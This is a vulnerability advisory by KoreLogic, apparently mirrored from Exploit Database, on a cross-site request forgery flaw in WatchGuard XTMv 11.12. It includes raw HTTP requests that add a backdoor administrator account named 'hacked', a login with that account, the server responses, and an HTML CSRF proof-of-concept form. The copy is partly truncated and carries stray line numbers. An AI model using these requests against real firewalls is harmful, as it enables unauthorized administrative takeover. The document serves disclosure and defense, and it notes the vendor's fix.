WatchGuard XTMv 11.12 Build 516911 – User Management Cross-Site Request Forgery

Exploit Database
154 阅读

作者： KoreLogic

日期： 2017-03-10
类别：
- webapps
平台：
- xml
来源：https://www.exploit-db.com/exploits/41579/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

<!--

KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery

Title: WatchGuard XTMv User Management Cross-Site Request Forgery

Advisory ID: KL-001-2017-004

Publication Date: 2017.03.10

Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt

1. Vulnerability Details

Affected Vendor: WatchGuard

Affected Product: XTMv

Affected Version: v11.12 Build 516911

Platform: Embedded Linux

CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)

Impact: Privileged Access

Attack vector: HTTP

2. Vulnerability Description

Lack of CSRF protection in the Add User functionality of the

XTMv management portal can be leveraged to create arbitrary

administrator-level accounts.

3. Technical Description

As observed below, no CSRF token is in use when adding a new

user to the management portal.

POST /put_data/ HTTP/1.1

Host: 1.3.3.7:8080

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/json

X-Requested-With: XMLHttpRequest

Content-Length: 365

Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287

DNT: 1

Connection: close

{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device

Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}

The HTTP response indicates that the changes were successful.

HTTP/1.1 200 OK

X-Frame-Options: SAMEORIGIN

Content-Length: 68

Expires: Sun, 28 Jan 2007 00:00:00 GMT

Vary: Accept-Encoding

Server: CherryPy/3.6.0

Pragma: no-cache

Cache-Control: no-cache, must-revalidate

Date: Sat, 10 Dec 2016 18:08:22 GMT

Content-Type: application/json

Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;

Path=/; secure

Connection: close

{"status": true, "message": ["The changes were saved successfully"]}

Now, the newly created backdoor account can be accessed.

POST /agent/login HTTP/1.1

Host: 1.3.3.7:8080

Accept: application/xml, text/xml, */*; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: text/xml

X-Requested-With: XMLHttpRequest

Content-Length: 414

Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53

DNT: 1

Connection: close

<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>

The response below shows the application issuing an authenticated

session cookie.

HTTP/1.1 200 OK

X-Frame-Options: SAMEORIGIN

Content-type: text/xml

Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly

Connection: close

Date: Sat, 10 Dec 2016 19:55:26 GMT

Server: none

Content-Length: 751

<?xml version="1.0"?>

<param>

<value>

<member><name>response</name><value></value></member>

<name>readwrite</name>

<member><name>privilege</name><value>2</value></member>

<member><name>peer_name</name><value>error</value></member>

</struct></value>

</member>

</struct>

</value>

</param>

</params>

</methodResponse>

4. Mitigation and Remediation Recommendation

The vendor has remediated this vulnerability in WatchGuard

XTMv v11.12.1. Release notes and upgrade instructions are

available at:

https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)

of KoreLogic, Inc. and Joshua Hardin.

6. Disclosure Timeline

2017.01.13 - KoreLogic sends vulnerability report and PoC to

WatchGuard.

2017.01.13 - WatchGuard acknowledges receipt of report.

2017.01.23 - WatchGuard informs KoreLogic that the

vulnerability will be addressed in the forthcoming

v11.12.1 firmware, scheduled for general

availability on or around 2017.02.21.

2017.02.22 - WatchGuard releases v11.12.1.

2017.03.10 - KoreLogic public disclosure.

7. Proof of Concept

-->

<html>

<body>

<input type="hidden"

name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}"

value="" />

</form>

</body>

</html>

<!--

KoreLogic, Inc. and are licensed under a Creative Commons

Attribution Share-Alike 4.0 (United States) License:

http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a

proven track record of providing security services to entities

ranging from Fortune 500 to small and mid-sized companies. We

are a highly skilled team of senior security consultants doing

by-hand security assessments for the most important networks in

the U.S. and around the world. We are also developers of various

tools and resources aimed at helping the security community.

https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:

https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

-->